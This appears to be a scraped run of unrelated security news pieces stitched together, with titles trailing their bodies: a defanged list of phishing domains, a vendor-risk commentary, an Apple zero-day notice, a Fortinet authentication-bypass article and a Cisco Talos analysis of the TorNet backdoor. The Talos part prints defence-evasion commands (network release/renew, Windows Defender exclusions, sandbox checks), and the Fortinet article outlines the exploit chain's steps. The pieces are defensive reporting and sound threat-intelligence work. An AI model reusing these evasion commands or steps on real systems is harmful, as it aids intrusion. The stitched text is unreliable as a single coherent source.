digitechmedia\[.\]agency  
forteautomobile\[.\]com  
global-verifications\[.\]com  
global-verify\[.\]com  
homee-acount\[.\]com  
itlinks\[.\]com\[.\]cn  
krakeri-login\[.\]com  
login-adsmicrosoft\[.\]helpexellent\[.\]com  
login\[.\]adsadvertising\[.\]online  
login\[.\]microsofttclicks\[.\]live  
micrasofit\[.\]xyz  
microosft\[.\]accounts-ads\[.\]site  
microsoft-ads\[.\]website  
microsoftadss\[.\]com  
microsoftadversiting\[.\]cloud  
microsoftbingads\[.\]com  
microsofyt\[.\]adversing-publicidade\[.\]pro  
mictrest\[.\]mnws\[.\]ru  
mlcrosoft-bing-acces\[.\]click  
mlcrosoftadvertlsing\[.\]online  
mudinhox\[.\]site  
ndnet\[.\]shop  
phlyd\[.\]com  
portfoliokrakenus\[.\]com  
portfoliolkraken\[.\]com  
portfoliopro-us\[.\]com  
portfolioskranen\[.\]com  
portofolioprospots\[.\]com  
potfoliokeiolenen\[.\]com  
potfoliokelaken\[.\]com  
potfoliokelaneken\[.\]com  
potfoliokenaiken\[.\]com  
potfoliokenkren\[.\]com  
potfolioketonelen\[.\]com  
potfolioskaneken\[.\]com  
potfolioskenaken\[.\]com  
potfolioskraineken\[.\]com  
potfolioskranaken\[.\]com  
potfolioskraneken\[.\]com  
pro-digitalus\[.\]com  
prokrakenportfolio\[.\]com  
rnlcrosoft\[.\]smartlabor\[.\]it  
sig-in-mlcrosoft-advertisings\[.\]site  
uiiadvertise\[.\]online  
wvvw-microsoft\[.\]xyz  
www-bingads\[.\]com  
www-microsoftsads\[.\]com  
www-v\[.\]userads\[.\]digital  
www34\[.\]con-webs\[.\]com  
www55\[.\]con-webs\[.\]com

 Microsoft advertisers phished via malicious Google ads 

Managing third-party risk in the SaaS era demands a proactive, data-driven approach beyond checkbox compliance.

Source: Olekcii Mach via Alamy Stock Photo

COMMENTRY

In June 2023, the MOVEit supply chain attack served as a harsh reminder of the vulnerabilities in our software-as-a-service (SaaS) ecosystem. Third-party risk management (TPRM) in today's world of SaaS applications is no longer just about ticking boxes on a checklist. The old methods, with their static questionnaires and outdated ISO 27001 and System and Organization Controls (SOC) — SOC 1, SOC 2, and SOC 3 — reports are simply not efficient anymore. With cyber threats, such as supply chain attacks and third-party integration exploits, becoming more sophisticated, organizations need a dynamic approach to managing SaaS vendors. Embracing automation, real-time visibility, and targeted assessments are crucial steps to stay ahead of potential risks.

Let's explore how organizations that rely heavily on SaaS apps can evolve their TPRM strategies to face modern security challenges head-on.

**The Growing Complexity of SaaS Oversight**

SaaS adoption is growing rapidly, bringing organizations convenience and flexibility. According to B2BSaaS estimates, the SaaS market was valued at $273.5 billion in 2023 and is expected to grow to $1.2 trillion by 2032. However, this growth also comes with an expanded attack surface and more complex data flows. For organizations handling sensitive customer data and navigating strict regulations, these challenges are critical.

Two trends amplify these challenges:

*   Explosion of SaaS apps: Companies use hundreds of SaaS and cloud apps, many introduced without official approval, complicating security oversight. Shadow IT often results in blind spots, making it harder to assess overall security.
    
*   Evolving threat landscape: Attackers increasingly target third-party vendors. Generative AI (GenAI) has further complicated the landscape, enabling attackers to enhance tactics and exploit integration points, misconfigured cloud services, and stolen credentials. The Okta breach of 2023 demonstrated the potential scale of damage from a supply chain attack.
    

These challenges highlight the inadequacy of relying solely on traditional security questionnaires and annual SOC 2 reports. Continuous visibility into vendors' security practices is essential for effective risk management.

**The Problem With Traditional Third-Party Risk Reviews**

Traditional risk reviews involve substantial manual effort and fall short in addressing modern threats:

*   Inefficient manual processes: Manually sending, tracking, and analyzing vendor questionnaires consumes excessive time and energy and delays the resolution of security issues.
    
*   Superficial questions: Generic Yes/No queries (e.g., "Do your developers follow secure coding practices?") fail to assess the effectiveness of vendors' security measures. More specific questions, tied to real-world scenarios, often yield actionable insights.
    
*   Outdated reports: Reports like ISO 27001 and SOC 2 quickly become obsolete in evolving SaaS environments. The emergence of GenAI has further accelerated the pace of change, necessitating updated, dynamic assessments.
    

**Evolving TPRM to Handle Modern SaaS Challenges**

To tackle these issues, organizations must adopt agile, data-centric approaches to vendor security:

1.  Embrace real-time assurance through trust centers. SOC 2 reports are a starting point, but critical vendors should offer ongoing visibility through automated trust centers. Tools like Sprinto, Drata, and Vento provide real-time insights into security controls and compliance, enabling proactive decisions.
    

1.  Make questionnaires smarter. Replace generic questionnaires with tailored assessments that probe deeper. Focus on how controls are implemented and monitored. For example, shift from "Do you secure ABC?" to "How do you secure ABC, and how do you verify its effectiveness?" Questions that examine metrics and outcomes help uncover the true state of security.
    
2.  Address talent gaps and boost technical expertise. Invest in developing skills in cloud security, SaaS configuration, and API management. Training internal teams or partnering with specialized vendors can bridge expertise gaps. The SolarWinds breach of 2020 underscores the need for visibility into supply chain vulnerabilities. Workshops and certifications can enhance team capabilities, keeping them informed of evolving risks.
    
3.  Include shadow IT and "free" tools. Review unpaid apps, open source tools, and browser extensions — often overlooked but risky. Shadow IT tools, while offering productivity, introduce unknown risks. Assessing these apps before they integrate into workflows reduces unexpected exposure. Include them in audits to ensure they meet baseline security standards.
    
4.  Use modern tools, not spreadsheets. Transition from spreadsheets to SaaS security posture management (SSPM) tools, which monitor misconfigurations, excessive permissions, and suspicious activities. AI-powered tools can further analyze vendor responses and highlight inconsistencies. Leveraging these tools saves time and enhances accuracy.
    

**What Can You Do When Revamping Your TPRM Strategy**

Evolving TPRM processes isn't easy. Avoid common pitfalls:

*   Avoid risky inaction: Delaying updates to vendor management increases exposure. Start with small, impactful improvements and scale gradually.
    
*   Avoid overcommitting resources: Implement changes incrementally, prioritizing high-impact areas. This ensures resource efficiency without overwhelming teams.
    
*   Set realistic expectations for AI: Leverage AI where it adds value while recognizing its limitations. AI tools should complement, not replace, human oversight.
    
*   Ensure team alignment: Align team skills with new vendor security goals. Equip teams to manage technical assessments effectively. Feedback loops can ensure continuous improvement and alignment with organizational objectives.
    

**What We Can Take From This**

Managing third-party risk in the SaaS era demands a proactive, data-driven approach. Organizations must go beyond checkbox compliance by leveraging real-time assurance, tailored assessments, and automation. Modernizing TPRM is essential to address the complexities of SaaS security.

While challenging, particularly for smaller organizations, the benefits of preventing breaches and protecting reputations outweigh the costs. Organizations can manage expenses effectively by prioritizing critical vendors and adopting phased changes while enhancing third-party risk management. The commitment to proactive strategies ensures resilience against an ever-evolving threat landscape.

**About the Author**

Information Security Officer, IMC Trading

Jatin Mannepalli, CISSP, CCSP is an information security officer (ISO) at IMC Trading, where he brings a deep commitment to managing security and risk across organizations. With more than 10 years of experience in the InfoSec space, he has built and led information security and risk management teams, and has also worked as a security consultant for major consulting firms like McKinsey & Company. Jatin is passionate about security governance and risk management, as well as developing technology-driven, customer-focused strategies that prioritize both organizational success and client satisfaction. Known for his holistic approach, he is dedicated to fostering a culture of security that aligns with the organization’s broader goals. In addition to his professional accomplishments, Jatin is recognized as one of the top voices in Information Security on LinkedIn. In his leisure time, he volunteers to promote security awareness in local communities and contributes to the cybersecurity community by helping develop exams for ISC2.

The Old Ways of Vendor Risk Management Are No Longer Good Enough

Apple has released a host of security updates for iOS, iPadOS, Mac, Apple Watch, and Apple TV. Update as soon as you can.

Apple has released a host of security updates across many devices, including for a zero-day bug which is being actively exploited in iOS.

Apple said:

> “A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 17.2.”

Devices affected are those that run:

*   iPhone XS and later
*   iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later
*   macOS Sequoia
*   Apple Watch Series 6 and later
*   All models of Apple TV HD and Apple TV 4K

If you use any of these then you should install updates as soon as you can. To check if you’re using the latest software version, go to **Settings** (or **System Settings**) > **General** \> **Software Update**. It’s also worth turning on Automatic Updates if you haven’t already, which you can do on the same screen.

**Technical details about the zero-day**

The zero-day vulnerability patched in this update is tracked as CVE-2025-24085. It is described as a use after free (UAF) issue in Apple’s Core Media framework that would allow an attacker to elevate privileges.

The Core Media framework handles multimedia applications like photos, videos, and real-time communication applications. UAF is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. In this case, successful exploitation could provide a malicious app with privileges on the affected device that it shouldn’t have.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 Apple users: Update your devices now to patch zero-day vulnerability 

The firewall specialist has patched the security flaw, which was responsible for a series of attacks reported earlier this month that compromised FortiOS and FortiProxy products exposed to the public Internet.

Source: Lutsenko via Oleksandr via Shutterstock

Fortinet has patched an actively exploited zero-day authentication bypass flaw affecting its FortiOS and FortiProxy products, which attackers have been exploiting to gain super-administrative access to devices to conduct nefarious activities, including breaching corporate networks.

Fortinet characterized the flaw, rated as critical and tracked as CVE-2024-55591 (CVSS 9.6), as an "authentication bypass using an alternate path or channel vulnerability" that "may allow a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module," according to a FortiGuard Labs security advisory last week.

Fortinet observed threat actors performing various malicious operations by exploiting the flaw. These activities included: creating an admin account on the device with a random user name; creating a local user account on the device with a random user name; creating a user group or adding a local user to an existing SSL VPN user group; adding and/or changing other settings, including firewall policy and/or firewall address; and logging in to the SSL VPN to get a tunnel to the internal network.

Fortinet recommended that customers using affected products follow the recommended upgrade path on its website to mitigate the flaw. It also offered workaround options in its advisory.

Related:For $50, Cyberattackers Can Use GhostGPT to Write Malicious Code

**First Signs of Fortinet Zero-Day Exploitation**

The first signs that something was amiss came earlier this month, when researchers at Arctic Wolf revealed that a zero-day flaw was likely to blame for a series of recent attacks on FortiGate firewall devices with management interfaces exposed on the public Internet. Attackers were targeting the devices to create unauthorized administrative logins and make other configuration changes, create new accounts, and perform SSL VPN authentication.

Fortinet quietly informed its customer base of the issue before revealing the patch and extent of the situation late last week; this low-key revelation is how Arctic Wolf got wind of it, according to a blog post analyzing the flaw by watchTowr Labs published on Jan. 27. However, security researchers did not yet know exactly what the flaw was or what the exploitation entailed.

That's become clearer now. The flaw resided within the jsconsole functionality, which is a graphical user interface (GUI) feature to execute command line interface (CLI) commands inside FortiOS's management interface, according to watchTowr Labs. "Specifically, the weakness in this functionality allowed attackers to add a new administrative account," according to the post.

Related:Change Healthcare Breach Impact Doubles to 190M People

Jsconsole is a WebSocket-based Web console to the CLI of the affected Fortinet appliances. "This CLI is all-powerful, since it is effectively the same as the actual provided CLI that is used by legitimate administrators to configure the device," according to watchTowr Labs. Therefore, if an attacker gains access to the Web console, the appliance itself should be considered compromised.

The researchers took a deep dive into the vulnerability and found that it was actually a chain of issues combined into one critical vulnerability that allowed attackers to follow four key steps to achieve super administrative access.

Those steps are: creating a WebSocket connection from a pre-authenticated HTTP request; using a special parameter local\_access\_token to skip session checks; exploiting a race condition in the WebSocket Telnet CLI to send authentication before the server does; and picking the access profile that an attacker wishes to assume, which in the case of the researchers' proof-of-concept was to become a super administrator.

**Mitigation & Protection Against CVE-2024-55591**

Fortinet devices are a popular target for threat actors, with vulnerabilities found in the products often widely exploited to breach not only devices but also act as a point of entry to attack corporate networks.

Related:The Case for Proactive, Scalable Data Protection

Organizations using the devices affected by the flaw are advised to follow the appropriate update path or apply the workaround provided by Fortinet.

Fortinet also noted in its advisory that an attacker generally would need to know an admin account's username to perform the attack and log in to the CLE to exploit the flaw. "Therefore, having a non-standard and non-guessable username for admin accounts does offer some protection, and is, in general, a best practice," according to the advisory.

However, the company added, since the targeted WebSocket is not itself an authentication point, attackers still have the possibility of brute-forcing the username to exploit the flaw.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Actively Exploited Fortinet Zero-Day Gives Attackers Super-Admin Privileges

Cisco Talos discovered an ongoing malicious campaign operated by a financially motivated threat actor targeting users, predominantly in Poland and Germany.

Tuesday, January 28, 2025 06:00

*   Cisco Talos discovered an ongoing malicious campaign operated by a financially motivated threat actor since as early as July 2024 targeting users, predominantly in Poland and Germany, based on the phishing email language. 
*   The actor has delivered different payloads, including Agent Tesla, Snake Keylogger, and a new undocumented backdoor we are calling TorNet, dropped by PureCrypter malware.  
*   The actor is running a Windows scheduled task on victim machines—including on endpoints with a low battery—to achieve persistence.  
*   The actor also disconnects the victim machine from the network before dropping the payload and then connects it back to the network, allowing them to evade detection by cloud antimalware solutions.  
*   We also found that the actor connects the victim’s machine to the TOR network using the TorNet backdoor for stealthy command and control (C2) communications and detection evasion. 

**The campaign **

The intrusions start with a phishing email as the initial infection vector. The actor is impersonating financial institutions and manufacturing and logistics companies by sending fake money transfer confirmations and fake order receipts, respectively. The phishing emails are predominantly written in Polish and German, indicating actor’s intent to primarily target users in those countries. We also found some phishing email samples from the same campaign written in English. We assess with medium confidence that the actor is financially motivated, based on the phishing email themes and the filenames of the email attachments.  

The phishing email has attachments with the file extension “.tgz”, indicating that the actor has used GZIP to compress the TAR archive of the malicious attachment file to disguise the actual malicious content of the attachment and evade email detections. 

Sample phishing email in Polish. 

Sample phishing email in German. 

When a user opens the compressed email attachment and manually unzips it and runs a .NET loader executable, it eventually downloads encrypted PureCrypter malware from a compromised staging server. The Loader decrypts the PureCrypter malware and runs it in the system memory.  

In a few intrusions in this campaign, we found that the PureCrypter malware drops and runs the TorNet backdoor. The TorNet backdoor establishes connection to the C2 server and also connects the victim machine to the TOR network. It has the capabilities to receive and run arbitrary .NET assemblies in the victim machine’s memory, downloaded from the C2 server, increasing the attack surface for further intrusions. 

**.NET loader implants PureCrypter **

Talos found that the compressed attachment files contain a large .NET executable file. The actor has instrumented the .NET executable to either download the next-stage malicious executables from a remote staging server or to reflectively load an embedded malicious binary.  

Some of the loader samples we analyzed in this campaign download the AES-encrypted binary of the PureCrypter malware hosted on compromised websites in paths “/filescontentgalleries/pictorialcoversoffiles/” and “/post-postlogin/” using a hardcoded URL. The encrypted PureCrypter binaries were stored with the arbitrary filenames using different file extensions, including .pdf, .dat, .wav, .vdf, .mp3 and .mp4. The loader decrypts the PureCrypter binary and loads reflectively. 

Snippet of the loader program that downloads the encrypted PureCrypter malware.

Network traffic showing the encrypted PureCrypter malware downloaded from the hosting site. 

In a few other loader samples, we found that the encrypted PureCrypter sample was embedded in the loader, which is decrypted using the AES algorithm and reflectively loaded into the victim machine’s memory.  

Snippet of the loader with embedded PureCrypter binary. 

**PureCrypter drops the TorNet backdoor **

The PureCrypter malware found in this intrusion is a Windows dynamic-link library obfuscated with Eziriz’s .NET Reactor obfuscator. It has resources of encrypted binaries of legitimate DLLs, including Protobuf-net and Microsoft task scheduler DLL along with the TorNet backdoor.  

PureCrypter initially creates a mutex on the victim machine and executes the command to release the currently assigned DHCP IP address of the victim machine, establishes persistence, performs various anti-analysis and detections tasks, drops and runs the payload, and finally executes a command to renew the IP address of the victim machine.  

Cmd /c ipconfig /release 
Cmd /c ipconfig /renew 

The threat actor is likely using this technique to evade detections from the cloud-based anti-malware programs by disconnecting the victim machine from the network and connects back to the network after dropping and running the backdoor.  

The PureCrypter malware performs various anti-debugger, anti-analysis, anti-VM, and anti-malware checks on the victim machine as described below: 

*   It checks if the process is debugged using the function “CheckRemoteDebuggerPresent”. 
*   It checks for the Sandboxie and Cuckoo sandbox environments by enumerating processes to look for “sbieDLL.dll” and “cuckoomon.dll”. 
*   It checks if the DLL is running in the virtual environment by executing the WMI queries and searches for the strings “VMware”, “VIRTUAL”, “AMI”, and “Xen”.  

Select \* from Win32\_BIOS 
Select \* from Win32\_ComputerSystem 

*   It also checks if the process running is associated with “vmGuestLib.dll” to detect the VMWare environment. 
*   It checks if the victim machine username is “john” or “anna” or “xxxxxxxx”.  
*   It checks for the strings “amsi.dll” and “amsiscanbuffer” in the running processes modules of the victim machine.  
*   It checks if the Event Tracing for Windows (ETW) is configured for the victim machine by attempting to check if any processes point to the function “EtwEventWrite” of “ntdll.dll”.  
*   It modifies the Windows Defender settings by executing the PowerShell commands to add its process and the path of the dropped backdoor to the exclusion lists.

Add-MpPreference –ExclusionPath 
Add-MpPreference –ExclusionProcess 

After the evasion checks, PureCrypter decrypts the encrypted backdoor from its resource and drops it to the user profile application temporary folder with a random file name. It also decrypts another file resource using a custom string decryption algorithm, generating the arbitrary filename strings and the task name strings for the Windows Task scheduler.  

PureCrypter establishes the persistence in the Run registry key by adding the path of the loader. It also creates a Windows task using a task name gained by decrypting the strings from the resource file and executes the loader every two to four minutes with no execution time limit. The task can run if the machine switches to battery power and will not stop if it runs on a low battery power. The threat actor has instrumented this technique to possibly ensure an uninterrupted infection avoiding the victim machine operating system to deprioritize the process when a victim machine is running on low battery power mode.  

Code snippet of creating the Windows schedule task. 

PureCrypter drops a Visual Basic script in the Windows startup folder with the instructions to load and execute the dropped backdoor. 

Code Snippet showing the command to drop and execute a VB Script.

After establishing persistence, PureCrypter loads the dropped backdoor by accessing it through a URL scheme “file\[://\]<Path of the dropped backdoor>” and injects the backdoor into the .NET runtime executable process in the victim machine. The threat actor is using this technique to possibly masquerade the file access activity as a web request in the victim machine logs and to bypass detections for loading a file from suspicious file paths on the victim machine.  

Code snippet showing the process injection.

**Payload TorNet creates a backdoor on the victim machine **

Talos discovered a new .NET backdoor as the payload in the recent intrusions of this campaign, which we call TorNet. TorNet backdoor is also obfuscated with Eziriz’s .NET Reactor obfuscator and has hash values for the compilation time. This could be the artifact that was created when the samples were compiled in Visual Studio with the “/deterministic” parameter. When Visual Studio is configured to generate deterministic binaries, the compiled date/time field of the binaries will be replaced by a hash of the compilation options. Talos had previously seen, and reported this technique used by other threat actors to disguise the actual compilation time of the malware binaries.    

TorNet initially decodes a base64-encoded string to obtain the C2 domain, port number, and an alphanumeric string of 16 characters (5e7a81857a353068). It then performs the anti-debugging, anti-malware, anti-VM, and sandbox evasion checks similar to PureCrypter we discussed in the previous section.  

Code snippet showing the base64 string decoding to obtain the string, C2 domain, and port number. 

After the evasion checks, TorNet establishes a TCP socket connection to the C2 server by resolving the IP address of the C2 domain decoded from the base64-encoded string. The connection uses one of the port numbers 8194, 7890, or 8410. We observed that the C2 domains used by the backdoor were resolving to the IP address 104\[.\]168\[.\]7\[.\]37 during the period of our research. 

TorNet backdoor sample connecting to the C2 using the domain and port number.

After establishing the connection to the C2 server, TorNet sends the gained string “5e7a81857a353068” by decoding the base64-encoded strings to the C2 server, creating a hexadecimal byte stream of length 20 and writes it to a memory stream by compressing it using the GzipStream function.  

HEX stream: “3A 12 12 10 35 65 37 61 38 31 38 35 37 61 33 35 33 30 36 38” 

ASCII equivalent: “:<2-byte place holder>\\n5e7a81857a353068” 

TorNet then generates an MD5 hash value of the string “5e7a81857a353068” and uses it as a key to encrypt the compressed 20-byte hexadecimal data stream using the triple DES algorithm. Using the Bitconverter function, TorNet splits the encrypted byte stream and sends it to the C2 server by writing it to the TCP stream through the socket.  

Code snippet of TorNet showing the data exfiltration to the C2 server through sockets. 

The C2 server may send an arbitrary encrypted .NET assembly as a response to a TorNet’s request. TorNet will decrypt the arbitrary binary and reflectively run it. During our research, we were unable to receive a response from the C2, still analyzing the TorNet binary allowed us to assess that the received response will be an arbitrary .NET assembly code, enabling the attack surface for further attack.  

Code snippet for running the received arbitrary .NET assembly. 

TorNet also connects the victim machine to the TOR network. It downloads the TOR expert bundle from the TOR Project archive site, unpacks it and runs the “tor\[.\]exe” as a background process to connect to TOR.  

Code snippet shows the download and execution of tor\[.\]exe. 

Once TOR is running, TorNet connects to the TOR network using the TOR SocksPort (127\[.\]0\[.\]0\[.\]1:9050), and with the “socket.Poll” function, it routes all traffic from the backdoor process on the victim machine through the TOR network. The threat actor is leveraging the TOR network to anonymize the C2 communication and evade detection.  

Connections from TorNet on analysis machine to the TOR nodes.

****Coverage** **

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here. 

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 64440, 64439, 64437, 64438 and 301115. 

ClamAV detections are also available for this threat: 

Win.Backdoor.TorNet-10041435-0    
Win.Downloader.TorNet-10041463-0    
Win.Malware.TorNet-10041565-0    
Win.Malware.TorNet-10041601-0    
Win.Trojan.TorNet-10041734-0 

**Indicators of Compromise  **

IOCs for this threat can be found in our GitHub repository here.

Tag

#ios